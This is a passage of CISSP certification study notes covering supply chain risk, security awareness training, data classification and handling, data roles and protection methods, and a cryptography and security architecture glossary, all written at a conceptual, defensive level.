Trike: an open source risk-based threat modeling methodology; provides a method of performing a reliable and
repeatable security audit, and a framework for collaboration and communication
Threat intelligence feed standards include:
CAPEC (Common Attack Pattern Enumeration and Classification): a dictionary of known attack
patterns
STIX (Structured Threat Information eXpression language): used to describe threats in a
standardized way
TAXII (Trusted Automated eXchange of Indicator Information): defines how threat information can be
shared and exchanged
1.11 Apply Supply Chain Risk Management (SCRM) concepts (OSG-10 Chpt 1)
24 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
1.11.1 Risks associated with the acquisition of products and services from suppliers and providers (e.g., product
tampering, counterfeits, implants)
Supply Chain Risk Management (SCRM): the means to ensure that all of the vendors or links in the
supply chain are:
reliable,
trustworthy,
reputable organizations that disclose their practices and security requirements to their business
partners (not necessarily to the public)
Each link in the chain should be responsible and accountable to the next link in the chain; each handoff is
properly organized, documented, managed, and audited
The goal of a secure supply chain is that the finished product is of sufficient quality, meets
performance and operational goals, provides stated security mechanisms, and that at no point in
the process was any element counterfeited or subject to unauthorized or malicious manipulation or
sabotage
The supply chain can be a threat vector, where materials, software, hardware, or data is being obtained
from a supposedly trusted source but the supply chain behind the source could have been compromised
and asset poisoned or modified
Supply chain attacks include things like product tampering, counterfeits, or implants; these attacks can
be difficult to detect, and changes or manipulations can be via hardware (even miniaturized chips), or via
software
choosing trusted and reputable vendors, and doing security monitoring, management and
assessments are important to lower these risks
1.11.2 Risk mitigations (e.g., third-party assessment and monitoring, minimum security requirements, service
level requirements, silicon root of trust, physically unclonable function, software bill of materials)
Before doing business with another company, an org needs to perform due-diligence, and third-party
assessments can help gather information and perform the assessment
An on-site assessment is useful to gain information about physical security and operations
During document review, your goal is to thoroughly review all the architecture, designs,
implementations, policies, procedures, etc.
A good understanding of the current state of the environment, especially to understand any
shortcomings or compliance issues prior to integrating the IT infrastructures
The level of access and depth of information obtained is usually proportional to how closely the
companies will work together
Creating security requirements that dovetail with SLAs and contracts is important, as are including things
like a silicon root of trust (RoT) (AKA hardware root of trust) to ensure the integrity, authenticity, and
confidentiality as a foundation of system startup security
Physically unclonable function (PUF): physical component that creates a unique digital identifier that
can create an electronic fingerprint for integrated circuits or devices
Software Bill of Materials (SBOM): a detailed list of all components, libraries, and dependencies
(including open-source and proprietary code) included in a software app; the purpose is to provide better
software transparency, security and compliance helping teams address risks and track vulnerabilities
1.12 Establish and maintain a security awareness, education, and training program
(OSG-10 Chpt 2)
1.12.1 Methods and techniques to increase awareness and training (e.g., social engineering, phishing, security
champions, gamification)
Before actual training takes place, user security awareness needs to take place; from there, training, or
teaching employees to perform their work tasks and to comply with the security policy can begin
25 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
All new employees require some level of training so that they will be able to comply with all
standards, guidelines, and procedures mandated by the security policy
Education is a more detailed endeavor in which students/users learn much more than they actually
need to know to perform their work tasks
Education is most often associated with users pursuing certification or seeking job promotion
Employees need to understand what to be aware of (e.g. types of threats, such as phishing and free USB
sticks), how to perform their jobs securely (e.g. encrypt sensitive data, physically protect valuable assets)
and how security plays a role in the big picture (company reputation, profits,and losses)
Training should be mandatory and provided both to new employees and yearly (at a minimum) for
ongoing training
Routine tests of operational security should be performed (such as phishing test campaigns,
tailgating at company doors and social engineering tests)
Social engineering: a form of attack that exploits human nature and behavior; the common social
engineering principles are authority, intimidation, consensus, scarcity, familiarity, trust, and urgency
familiarity: as a social engineering principle, an attempt to exploit someone's native trust in
things that are familiar; might include claiming to know a coworker (existing or not), and
designed to put the target in a mindset that promotes willingness to provide info
social engineering attacks include phishing, spear phishing, business email compromise
(BEC), whaling, smishing, vishing, spam, shoulder surfing, invoice scams, hoaxes,
impersonation, masquerading, tailgating, piggybacking, dumpster diving, identity fraud, typo
squatting, and influence campaigns
while many orgs donʼt perform social engineering campaigns (testing employees using
benign social engineering attempts) as part of security awareness, it is likely to gain traction
outside of campaigns, presenting social engineering scenarios and information is a common
way to educate
Phishing: phishing campaigns are popular, and many orgs use third-party services to routinely test
their employees with fake phishing emails
such campaigns produce valuable data, such as the percentage of employees who open the
phishing email, the percentage who open attachments or click links, and the percentage who
report the fake phishing email as malicious
Security champions: the term "champion" has been gaining ground; orgs often use it to designate a
person on a team who is a subject matter expert in a particular area or responsible for a specific
area
e.g. somebody on the team could be a monitoring champion — they have deep knowledge
around monitoring and evangelize the benefits of monitoring to the team or other teams
a security champion is a person responsible for evangelizing security, helping bring security
to areas that require attention, and helping the team enhance their skills
Gamification: legacy training and education are typically based on reading and then answering
multiple-choice questions to prove knowledge; gamification aims to make training and education
more fun and engaging by packing educational material into a game
gamification has enabled organizations to get more out of the typical employee training
Security champions: team member who acts as the liaison between their team and the security
team, promoting secure development practices and helping integrate security into daily workflows
1.12.2 Periodic content reviews to include emerging technologies and trends (e.g., cryptocurrency, artificial
intelligence (AI), blockchain)
On-going training (or teaching people how to perform their tasks and comply with policies) and education
(teaching students/users more than they need to know to perform specific tasks) is important as is
developing security champions
26 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
It's also important to periodically review training material content, especially in regard to the fast pace of
change of newer technologies such as AI, blockchain and even cryptocurrencies
emerging tech trends should be incorporated into training materials
not only material updates, but methods should also be updated to keep content and approach
relevant and from getting stale
Threats are complex, so training needs to be relevant and interesting to be effective; this means updating
training materials and changing out the ways which security is tested and measured
if you always use the same phishing test campaign or send it from the same account on the same
day, it isnʼt effective, and the same applies to other materials
instead of relying on long/detailed security documentation for training and awareness, consider
using internal social media tools, videos and interactive campaigns
1.12.3 Program effectiveness evaluation
Time and money must be allocated for evaluating the companyʼs security awareness and training; the
company should track key metrics, such as the percentage of employees who click on a fake phishing
campaign email links
Also see my articles on risk management:
Part 1 introduces risk and risk terminology from the lens of the (ISC)² Official Study Guide
Since the primary goal of risk management is to identify potential threats against an organization's assets, and
bring those risks into alignment with an organization's risk appetite, in Part2, we cover the threat assessment --
a process of examining and evaluating cyber threat sources with potential system vulnerabilities
we look at how a risk assessment helps drive our understanding of risk by pairing assets and their
associated potential threats, ranking them by criticality
we also discuss quantitative analytic tools to help provide specific numbers for various potential risks,
losses, and costs
In the third installment, we review the outcome of the risk assessment process, looking at total risk, allowing us
to determine our response to each risk/threat pair and perform a cost/benefit review of a particular safeguard or
control
we look at the categories and types of controls and the idea of layering them to provide several different
types of protection mechanisms
we also review the important step of reporting out our risk analysis and recommended responses, noting
differences in requirements for messaging by group
Domain-2 Asset Security
Domain 2 of the CISSP exam covers asset security making up ~10% of the test
Asset security includes the concepts, principles, and standards of monitoring and securing any asset important
to the organization
The Asset Security domain focuses on collecting, handling, and protecting information throughout its lifecycle;
the first step is classifying information based on its value to the organization
Anonymization: replaces privacy data with useful but inaccurate data; the dataset can be shared, but
anonymization removes individual identities; anonymization is permanent
Asset: anything of value owned by the organization
Asset lifecycle: phases an asset goes through, from creation (or collection) to destruction
EPROM / UVEPROM: erasable programmable read-only memory, is a type of programmable read-only memory
(PROM) chip that retains its data when its power supply is switched off; chips my be erased with ultraviolet light
EEPROM: Electrically Erasable Programmable Read-Only Memory; chips may be erased with electrical current
27 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
PROM: programmable read-only memory, a form of digital memory where the contents can be changed once
after manufacture of the device
RAM: Random Access Memory - volatile memory that loses contents when the computer is powered off
Randomized masking: an anonymization method that cannot be reversed when done correctly
ROM: nonvolatile memory that can't be written to by end users
TEMPEST: a classification of technology designed to minimize the electromagnetic emanations generated by
computing devices; TEMPEST technology makes it difficult, if not impossible, to compromise confidentiality by
capturing emanated information; TEMPEST countermeasures to Van Eck phreaking (i.e. eavesdropping), include
Faraday cages, white noise, control zones, and shielding
2.1 Identify and classify information and assets (OSG-10 Chpt 5)
2.1.1 Data classification
Managing the data lifecycle refers to protecting it from cradle to grave -- steps need to be taken to
protect data when it's first created until it's destroyed
One of the first steps in the lifecycle is identifying and classifying information and assets, often within a
security policy
In this context, assets include sensitive data, the hardware used to process that data, and the media used
to store/hold it
Data categorization: process of grouping sets of data, info or knowledge that have comparable
sensitivities (e.g. impact or loss rating), and have similar law/contract/compliance security needs; the act
of assigning a classification level to an asset
Sensitive data: any information that isn't public or unclassified, and can include anything an org needs to
protect due to its value, or to comply with existing laws and regulations
Personally Identifiable Information (PII): any information that can identify an individual
more specifically, info about an individual including (1) any info that can be used to distinguish or
trace an individual‘s identity, such as name, social security number, date and place of birth,
mother‘s maiden name, or biometric records; and (2) any other information that is linked or linkable
to an individual, such as medical, educational, financial, and employment information (NIST SP
800-122)
Protected Health Information (PHI): any health-related information in any form that can be related to a
specific person; note that HIPAA applies to healthcare providers, health insurers, clearinghouses, and any
org that handles PHI
Proprietary data: any data that helps an organization maintain a competitive edge
Organizations classify data using labels
government classification labels include:
Top Secret: if disclosed, could cause massive damage to national security, such as the
disclosure of spy satellite information
Secret: if disclosed, can adversely affect national security
Unclassified: not sensitive
non-government organizations use labels such as:
Confidential/Proprietary: only used within the org and, in the case of unauthorized
disclosure, it could suffer serious consequences
Private: may include personal information, such as credit card data and bank accounts;
unauthorized disclosure can be disastrous
Sensitive: needs extraordinary precautions to ensure confidentiality and integrity
Public: can be viewed by the general public and, therefore, the disclosure of this data would
not cause damage
labels can be as granular and custom as required by the org
It is important to protect data in all states: at rest, in transit, or in use
28 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
The best way to protect data confidentiality is via use of strong encryption
2.1.2 Asset Classification
It's important to identify and classify assets, such as systems, mobile devices etc.
Owners are accountable for an asset and protecting its value
Asset Classification: assigning assets the level of protection required based on their value to the org;
assets require identified owner to be classified and protected adequately; derived from compliance
mandates, the process of recognizing organizational impacts if information suffers any security
compromise (whether to confidentiality, integrity, availability, non-repudiation, authenticity, privacy, or
safety)
Asset classifications should match data classification, i.e. if a computer is processing top secret data, the
computer should be classified as a top secret asset
Clearance: relates to access of certain classification of data or equipment, and who has access to that
level or classification
A formal access approval process should be used to change user access; the process should involve
approval from the data/asset owner, and the user should be informed about rules and limits
before a user is granted access they should be educated on working with that level of classification
Classification levels can be used by businesses during acquisitions, ensuring only personnel who need to
know are involved in the assessment or transition
In general, classification labels help users use data and assets properly, for instance by restricting
dissemination or use of assets by their classification
Asset classification should include confidentiality (sensitivity), integrity (accuracy), and availability
(criticality)
2.2 Establish information and asset handling requirements (OSG-10 Chpt 5)
Asset handling: procedures that mitigate risks associated with who and how assets are moved, stored, and
retrieved ensuring proper tools and technologies used; handling requirements are based on the classification of
the asset (not the media type); handling can refer to secure transport of media through its lifetime
The data and asset handling key goal is to prevent data breaches, by using:
Data Maintenance: on-going efforts to organize and care for data through its life cycle
Data collection limitations: only store data that has a clear business purpose
Data Loss Prevention (DLP): systems that detect and block data exfiltration attempts; three primary
types:
network-based DLP: placed on the edge of a network, scans all outgoing network data
endpoint-based DLP: scans stored files and can be used to prevent printing or copying sensitive
data to removable storage
cloud-based DLP: similar to network DLP but designed specifically for cloud-native environments
Labeling: the association of security attributes with subjects and objects represented by internal data
structures; labels are system-readable and enable system-based enforcement of security policies; labeling
often uses things like: metadata, barcodes, QR codes, RFID or GPS tags
Marking: association of security attributes in a human-readable form, enabling process-based enforcement of
security policies; sensitive information/assets ensures proper handling (both physically and electronically)
Data Collection Limitation: prevent loss by not collecting unnecessary sensitive data; a best practice when
collecting customer data, for instance, is to limit the amount of data collected to only what is needed
Data Location: keep dup copies of backups, on- and off-site
Storage: data storage and associated media are based on the classification of the data; define storage
locations and procedures by storage type; use physical locks for paper-based media, and encrypt electronic
data
Destruction: retention and destruction of data should be based on data classification and archiving policies;
destroy data no longer needed by the organization; policy should define acceptable destruction methods by
29 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
an org should keep track of intangible assets, like intellectual property, patents, trademarks, and
companyʼs reputation, and copyrights to protect them
note: patents in the US are valid for 20 years
2.3.3 Asset management
Asset management refers to managing both tangible and intangible assets; this starts with inventories of
assets, tracking the assets, and taking additional steps to protect them throughout their lifetime
The primary goal of asset management is to prevent losses (by tracking and protecting assets)
Accountability: ensures account management; only authorized users are accessing a system and using it
properly
Hardware assets: IT resources such as computers, servers, routers, switches and peripherals
use an automated configuration management system (CMS) to help with hardware asset
management
use barcodes, RFID tags to track hardware assets
Software assets: operating systems and applications
important to monitor license compliance to avoid legal issues
software licensing also refers to ensuring that systems do not have unauthorized software installed
To protect intangible inventories (like intellectual property, patents, trademarks, and companyʼs
reputation, and copyrights), they need to be tracked
2.4 Manage data lifecycle (OSG-10 Chpt 5)
2.4.1 Data roles (i.e., owners, controllers, custodians, processors, users/subjects)
System owner: controls the computer storing the data; usually includes software and hardware
configurations and support services (e.g. cloud implementation)
data owner is the person responsible for classifying, categorizing, and permitting access to the
data; the data owner is the person who is best familiar with the importance of the data to the
business
system owners are responsible for the systems that process the data
system owner is responsible for system operation and maintenance, and associated
updating/patching as well as related procurement activities
per NIST SP 800-18, information system owner has the following responsibilities:
responsible for the security of the system that stores or processes the data
develops the system security plan
maintains the system security plan and ensures that the system is deployed/operated
according to security requirements
ensures that system users and support personnel receive the requisite security training
updates the system security plan as required
assists in the identification, implementation, and assessment of the common security
controls
Data controller: decide what data to process and how to process it
the data controller is the person or entity that controls the processing of the data - deciding what
data to process, why this data should be processed, and how it is processed
e.g. a company that collects personal information on employees for payroll is a data controller (but,
if they pass this info to a third-party to process payroll, the payroll company is the data processor,
see below)
Data processor: an entity working on behalf (or the direction) of the data controller, that processes PII;
they have a responsibility to protect the privacy of the data and not use it for any purpose other than
directed by the data controller; generally, a data processor is any system used to process data
31 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
processing data on behalf of the Data Controller while ensuring quality, validation, and compliance,
safe custody, transport, storage of the data and implementation of business rules
a controller can hire a third party to process data, and in this context, the third party is the data
processor; data processors are often third-party entities that process data for an org at the
direction of the data controller
note GDPR definition: "a natural or legal person, public authority, agency, or other body, which
processes personal data solely on behalf of the data controller"
GDPR also restricts data transfers to countries outside EU, with fines for violations
many orgs have created dedicated roles to oversee GDPR data laws are followed
Data custodian: a custodian is delegated, from the system owner, day-to-day responsibilities for
properly storing and protecting data; responsible for the protection of data through maintenance
activities, backing up and archiving, and preventing the loss or corruption and recovering data
Data steward: a data steward has business responsibility for data (e.g. data quality, governance,
compliance, metadata definition etc)
Security administrator: responsible for ensuring the overall security of entire infrastructure; they
perform tasks that lead to the discovery of vulnerabilities, monitor network traffic and configure tools to
protect the network (like firewalls and antivirus software)
security admins also devise security policies, plans for business continuity and disaster recovery
and train staff
Supervisors: responsible for overseeing the activities of all the above entities and all support personnel;
they ensure team activities are conducted smoothly and that personnel is properly skilled for the tasks
assigned
Users: any person who accesses data from a computer device or system to accomplish work (think of
users as employees or end users)
users should have access to the data they need to perform tasks; users should have access to data
according to their roles and their need to access info
must comply with rules, mandatory policies, standards and procedures
users fall into the category of subjects, and a subject is any entity that accesses an object such as
a file or folder
note that subjects can be users, programs, processes, services, computers, or anything else
that can access a resource
2.4.2 Data Collection
One of the easiest ways of preventing the loss of data is to simply not collect it
The data collection guideline: if the data doesn't have a clear purpose for use, don't collect it, and don't
store it; this is why many privacy regulations mention limiting data collection
2.4.3 Data location
Data location: in this context, refers to the location of data backups or data copies
If a company's system is on-prem, keeps data on-site, but regularly backups up data, best practice is to
keep a backup copy on site and backup copy off-site
Consider distance between data/storage locations to mitigate potential mutual (primary and backup)
damage risk
2.4.4 Data maintenance
Data maintenance: managing data through the data lifecycle (creation, usage, retirement); data
maintenance is the process (often automated) of making sure the data is available (or not available)
based on where it is in the lifecycle
Ensuring appropriate asset protection requires that sensitive data be preserved for a period of not less
than what is business-required, but for no longer than necessary
32 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
2.6 Determine data security controls and compliance requirements (OSG-10 Chpt 5)
You need security controls that protect data in each possible state: at rest, in transit or in use
Each state requires a different approach to security; note that there arenʼt as many security options for data in
use as there are for data at rest or data in transit
keeping the systems patched, maintaining a standard computer build process, and running anti-
virus/malware are typically the real-world primary protections for data in use
2.6.1 Data states (e.g., in use, in transit, at rest)
The three data states are at rest, in transit, and in use
Data at rest: any data stored on media such as hard drives or external media
Data in transit: AKA data in motion; any data transmitted over a network
encryption methods protect data at rest and in transit
Data in use: data in memory and used by an application
applications should flush memory buffers to remove data after it is no longer needed
2.6.2 Scoping and tailoring
Baseline: documented, lowest level of security config allowed by a standard or org
After selecting a control baseline, orgs fine-tune with tailoring and scoping processes; a big part of the
tailoring process is aligning controls with an org's specific security requirements
Tailoring: refers to modifying the list of security controls within a baseline to align with the org's mission
includes the following activities:
identifying and designating common controls; specification of organization-defined
parameters in the security controls via explicit assignment and selection statements
applying scoping guidance/considerations
selecting/specifying compensating controls
assigning control values
Scoping: setting the boundaries of security control implementation; limiting the general baseline
recommendations by removing those that do not apply; part of the tailoring process and refers to
reviewing a list of baseline security controls and selecting only those controls that apply to the systems
you're trying to protect
scoping processes eliminate controls that are recommended in a baseline
2.6.3 Standards selection
Organizations need to identify the standards (e.g. PCI DSS, GDPR etc) that apply and ensure that the
security controls they select fully comply with these standards
Even if the org doesn't have to comply with a specific standard, using a well-designed community
standard can be helpful (e.g. NIST SP 800 documents)
Standards selection: the process by which organizations plan, choose and document technologies or
architectures for implementation
e.g. you evaluate three vendors for a security control; you could use a standards selection process
to help determine which solution best fits the org
Vendor selection is closely related to standards selection but focuses on the vendors, not the
technologies or solutions
The overall goal is to have an objective and measurable selection process
if you repeat the process with a totally different team, the alternate team should come up with the
same selection
34 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
2.6.4 Data protection methods (e.g., Digital Rights Management (DRM), Data Loss Prevention (DLP), Cloud
Access Security Broker (CASB))
Data protection methods include:
digital rights management (DRM): methods used in attempt to protect copyrighted materials;
purpose is to prevent the unauthorized use, modification, and distribution of copyrighted works
Cloud Access Security Brokers (CASBs): software placed logically between users and cloud-
based resources ensuring that cloud resources have the same protections as resources within a
network
CASB is a solution for security policy enforcement, ensuring security policies and compliance
are met when accessing cloud apps and data; it can be used on-premise or in the cloud
the four cornerstones of CASBs are visibility, data security, threat detection, and compliance
note that entities must comply with the EU GDPR, and use additional data protection
methods/controls such as anonymization and randomized masking (which, when done correctly,
can't be reversed), or quasi-anonymization which can be reversed (pseudonymization,
tokenization, encryption)
One of the primary methods of protecting the confidentiality of data is encryption
Options for protecting your data vary depending on its state:
Data at rest: consider encryption for operating system volumes and data volumes, and backups as
well
be sure to consider all locations for data at rest, such as tapes, USB drives, external drives,
RAID arrays, SAN, NAS, and optical media
DRM is useful for data at rest because DRM "travels with the data" regardless of the data
state
DRM is especially useful when you canʼt encrypt data volumes
Data in transit: think of data in transit wholistically -- moving data from anywhere to anywhere; use
encryption for data in transit
e.g. a web server uses a certificate to encrypt data being viewed by a user, or IPsec
encrypting a communication session
most important point is to use encryption whenever possible, including for internal-only web
apps
DLP solutions are useful for data in transit, scanning data on the wire, and stopping the
transmission/transfer, based on the DLP rules set (e.g. outbound data that contains numbers
matching a social security number pattern, a DLP rule can be used to block that traffic)
Data in use:
CASB solution often combines DLP, a web application firewall with some type of
authentication and authorization, and a network firewall in a single solution; A CASB solution
is helpful for protecting data in use (and data in transit)
Pseudonymization: refers to the process of using pseudonyms to represent other data; process of
replacing data elements with pseudonyms or aliases
A pseudonym is an alias, and pseudonymization can prevent data from directly identifying an entity
(i.e. person)
An external dataset holds the original data along with the pseudonym such that the original data
can be recreated
Therefore, unlike full anonymization, pseudonymized data can be reversed if the key is available
Tokenization: use of a token, typically a random string of characters, to replace other data
note that tokenization is similar to pseudonymization in that they are both used to represent other
data, and the token or pseudonym have no meaning or value outside the process that creates and
links them to that data
example of tokenization used in CC transactions:
registration: app on user's smart phone securely sends CC info to the credit card processor (CCP)
35 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
The CCP sends the CC info to a tokenization vault, creating a token and associating it with
the user's phone
usage: when the user makes a purchase, the POS system sends the token to the CCP for
authorization
validation: the CCP sends the token to the tokenization vault; the vault replies with the CC info, the
charge is processed
completing the sale: the CCP sends a reply to the POS indicating the charge is approved
this system prevents CC theft at the POS system
Domain-3 Security Architecture and Engineering
You may find this domain to be more technical than others, and if you have experience working in a security
engineering role you likely have an advantage; if not, allocate extra time to this domain to ensure you have a good
understanding of the topics; domain 3 is weighted around 13%
Advanced Encryption Standard (AES): uses the Rijndael symmetric algorithm and is the US gov standard for
the secure exchange of sensitive but unclassified data; AES uses key lengths of 128, 192, and 256 bits, and a
fixed block size of 128 bits, achieving a higher level of security than the older DES algorithm
Algorithm: a mathematical function that is used in the encryption and decryption process; can be simply or
very complex; also defined as a set of instructions by which encryption and decryption is done
Argon2: a secure key derivation and password hashing algorithm designed to protect against brute-force and
side-channel attacks; it was the winner of the Password Hashing Competition in 2015 and is considered highly
secure and efficient, especially for systems requiring robust password protection
ASLR: Address space layout randomization (ASLR) is a memory-protection process for operating systems
(OSes) that guards against buffer-overflow attacks by randomizing the location where system executables are
loaded into memory
Block Mode Encryption: using fixed-length sequences of input plaintext symbols as the unit of encryption
Block cipher: method of encrypting text that produces ciphertext, where a cryptographic key and algorithm are
applied to a block of data at once/as a group, instead of one bit at a time; takes a number of bits and encrypts
them in a single unit, padding the plaintext to achieve a multiple of the block size; the Advanced Encryption
Standard (AES) algorithm uses 128-bit blocks
Cipher: always meant to hide the true meaning of a message; always secret; types of ciphers include
transposition, substitution, stream, and block
Ciphertext: altered form of a plaintext message so as to be unreadable for anyone expect the intended
recipients (it's a secret)
Cleartext: any information that is unencrypted, although it might be in an encoded form that is not easily
human-readable (such as base64 encoding)
Cloud Controls Matrix (CCM): Cloud Security Alliance (CSA) framework designed to provide security
principles to guide cloud vendors and assist prospective cloud customers in assessing the risks of cloud usage
Code: cryptographic systems of symbols that operate on words or phrases and are sometimes secret, but don't
always provide confidentiality
Collision: occurs when a hash function generates the same output for different inputs
Cryptanalysis: study of techniques for attempting to defeat cryptographic methods and generally information
security services; Cryptanalysis is the process of transforming or decoding communications from non-readable
to readable format without having access to the real key; two major types of cryptanalysis: cryptanalytic
attacks, and cryptographic attacks
Cryptanalytic attack: attack with a primary goal of deducing the key
Cryptographic Hash function: process or function that transforms an input plaintext into a unique value called
a hash (or hash value); note that they do not use cryptographic algorithms, as hashes are one-way functions
where it's infeasible to determine the plaintext; Message digests are an example of cryptographic hash
36 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Cryptography: study of/application of methods to secure the meaning and content of messages, files etc by
disguise, obscuration, or other transformations
Cryptosystem: complete set of hardware, software, communications elements and procedures that allow
parties to communicate, store or use info protected by cryptographic means; includes algorithm, key, and key
management functions
Cryptovariable: parameter associated with a particular cryptographic algorithm; e.g. block size, key length and
number of iterations
Cyber-physical systems: systems that use 'computational means' to control physical devices
Decoding: the reverse process from encoding, converting the encoded message back to plaintext format
Decryption: the reverse process from encryption
Elliptic-curve cryptography (ECC): a newer mainstream asymmetric algorithm, is normally 256 bits in length
(a 256-bit ECC key is equivalent to a 3072-bit RSA key), making it securer and able to offer stronger anti-attack
capabilities
Encoding: action of changing a message or set of info into another format through the use of code; unlike
encryption, encoded info can still be read by anyone with knowledge of the encoding process
Encryption: process and act of converting the message from plaintext to ciphertext (AKA enciphering)
Enterprise Security Architecture: methods to ensure security is aligned with org goals and objectives to
protect critical components (people, process, and technology)
Factoring attack: in terms of the test, only the RSA algorithm uses factoring as the hard math problem; so if
you see factoring attack, think RSA
Fog computing: advanced computational architecture often used as an element in IIoT; fog computing relies on
sensors, IoT devices, or edge computing devices to collect data, then transfers it back to a central location for
processing (centralizing processing and intelligence)
Frequency analysis: form of cryptanalysis that uses frequency of occurrence of letters, words or symbols in
the ciphertext as a way of reducing the search space
Hybrid encryption system: a system that uses both symmetric and asymmetric encryption
International Data Encryption Algorithm (IDEA): IDEA is a form of symmetric key block cipher encryption that
uses a 128-bit key and operates on 64-bit blocks; it encrypts a 64-bit block of plaintext into a 64-bit block of
ciphertext, and the input plaintext block is divided into four sub-blocks of 16 bits each
Initialization Vector (IV): a random string of bits (aka a nonce) that is XORed with a message, reducing
predictability and repeatability; size of the IV varies by algorithm but normally is the same length as the block
size of the cipher (or as large as the encryption key); IV is the cryptographic version of a random number
Key: the input that controls the operation of the cryptographic algorithm, determining the behavior of the
algorithm and permits the reliable encryption and decryption of the message
Key clustering: weakness in cryptography where a plain-text message generates identical ciphertext messages
when using the same algorithm but using different keys
Key escrow: process by which keys (asymmetric or symmetric) are placed in a trusted storage agent's custody,
for later retrieval
Key generation: the process of creating a new encryption/decryption key
Key pair: matching set of one public and one private key
Key recovery: process of reconstructing an encryption key from the ciphertext alone; if there is a workable key
recovery system, it means the algorithm is not secure
Key space: represents the total number of possible values of keys in a cryptographic algorithm or password;
keyspace = 2 to the power of the number of bits, so 4 bits = 16 keys, 8 bits = 256 keys
Lattice-based Cryptography: Lattice-based cryptography leverages complex grids or constructions known as
lattices for the purpose of encryption and decryption; involves mathematical problems that remain hard to solve
even with the enhanced computational power of quantum computing
Meet-in-the-middle: attack that uses a known plaintext message and both encryption of the plaintext and
decryption of the ciphertext simultaneously in a brute-force manner to identify the encryption key; 2DES is
vulnerable to this attack
37 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Microcontroller: similar to system on a chip (SoC), consists of a CPU, memory, IO devices, and non-volatile
storage (e.g. flash or ROM/PROM/EEPROM); think Raspberry Pi or Arduino
Mobile device deployment models: that cover allowing or providing mobile devices for employees include:
BYOD (Bring Your Own Device), COPE (Company Owned/Personally Enabled), CYOD (Choose Your Own
Device), and COBO (Company Owned/Business Only); also consider VDI and VMI options
Mobile device deployment policies: should address things like data ownership, support ownership, patch and
update management, security product management, forensics, privacy, on/offboarding, adherence to corporate
policies, user acceptance, legal concerns, acceptable use policies, camera/video, microphone, Wi-Fi Direct,
tethering and hot spots, contactless payment methods, and infrastructure considerations
Multi-state systems: certified to handle data from different security classifications simultaneously
One-time pad: series of randomly generated symmetric encryption keys, each one to be used only once by the
sender and recipient; to be successful, the key must be generated randomly without any known pattern; the key
must be at least as long as the message to be encrypted; the pads must be protected against physical
disclosure and each pad must be used only one time, then discarded
Out-of-band: transmitting or sharing control information (e.g. encryption keys and crypto variables) by means
of a separate and distinct communications path, channel, or system
Password-Based Key Derivation Function 2 (PBKDF2): securely derives cryptographic keys from passwords;
by applying salting and key stretching (through multiple hashing iterations), PBKDF2 transforms a password into
a cryptographic key that can be used for encrypting data or securely storing passwords; this process makes it
much harder for attackers to guess or brute-force the password, as it increases the computational work
required to test each possible password, improving resistance against attacks
Pepper: a large constant number used to increase the security of the hashed password further; it is stored
outside of the database holding the hashed passwords
Personal electronic device (PED) security features can usually be managed using mobile device management
(MDM) or unified endpoint management (UEM) solutions, including device authentication, full-device
encryption, communication protection, remote wiping, communication protection, device lockout, screen locks,
GPS and location services, content management, app control, push notification management, third-party app
store control, rooting/jailbreaking, credential management and more
Plaintext: message or data in its readable form, not turned into a secret
Post-Quantum Cryptography: development of new types of cryptographic approaches that can be
implemented using conventional computing, and is resistant to quantum computing attacks; note that Lattice-
based cryptography is resistant to most, but not all, quantum attacks (also see my article on quantum
computing threats and opportunities)
Remote attestation: feature of the TPM (Trusted Platform Module) that creates a hash value from the system
configuration to confirm the integrity of the configuration
RTOS: real-time operating system (RTOS) is an operating system specifically designed to manage hardware
resources and run applications with precise timing and high reliability; they are designed to process data with
minimum latency; an RTOS is often stored on ROM; they use deterministic timing, meaning tasks are completed
within a defined time frame and is designed to operate in a hard (i.e. missing a deadline can cause system
failure) or soft (missing a deadline degrades performance but is not catastrophic) real-tme condition
Salting: adds additional bits to a password before hashing it, and helps thwart rainbow attacks; algorithms like
Argon2, bcrypt, and PBKDF2 add salt and repeat the hashing function many times; salts are stored in the same
database as the hashed password
Salting vs key stretching: salting adds randomness and uniqueness to each password before hashing, which
reduces the effectiveness of rainbow table attacks; key stretching makes the hashing process deliberately slow,
making it much more challenging for attackers to crack passwords using brute-force or precomputed tables;
common password hashing algorithms that use key stretching include PBKDF2, bcrypt, and scrypt
SDx: software-defined everything refers to replacing hardware with software using virtualization; includes
virtualization, virtualized software, virtual networking, containerization, serverless architecture, IaC, SDN, VSAN,
software-defined storage (SDS), VDI, VMI SDV, and software-defined data center (SDDC)
38 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Session key: a symmetric encryption key generated for one-time use; usually requires a key encapsulation
approach to eliminate key management issues
Sherwood Applied Business Security Architecture (SABSA): Enterprise Security Architecture based on a
risk-driven model based on business requirements for security
Static Environments: apps, OSs, hardware, or networks that are created/configured to meet a particular need
or function are set to remain unaltered; static environments, embedded systems, network-enabled devices,
edge, fog, and mobile devices need security management that may include network segmentation, security
layers, app firewalls, manual updates, firmware version control, wrappers, and control redundancy/diversity
Stream mode encryption: system using a process that treats the input plaintext as a continuous flow of
symbols, encrypting one symbol at a time; usually uses a streaming key, using part of the key as a one-time key
for each symbol's encryption
Stream cipher: a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit
stream; each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a
ciphertext stream
Substitution cipher: uses an encryption algorithm to replace each character or bit of the plaintext message
with a different character; one of the earliest substitution ciphers was developed by Julius Caesar, known as the
"Caesar cipher"
Symmetric encryption: process that uses the same key (or a simple transformation of it) for both
encryption/decryption
The Open Group Architecture Framework (TOGAF): Enterprise Security Architecture that provides for rapid
and iterative development, defining business goals and aligning them with architecture objectives
Transposition cypher: encryption/decryption process using transposition
Trust and Assurance: trust is the presence of a security mechanism or capability; assurance is how reliable the
security mechanism(s) are at providing security
VESDA: very early smoke detection process (air sensing device brand name)
Work factor: (AKA Work function) is a way to measure the strength of a cryptography system, measuring the
effort in terms of cost/time to decrypt messages; amount of effort necessary to break a cryptographic system
using a brute-force attack, measured in elapsed time
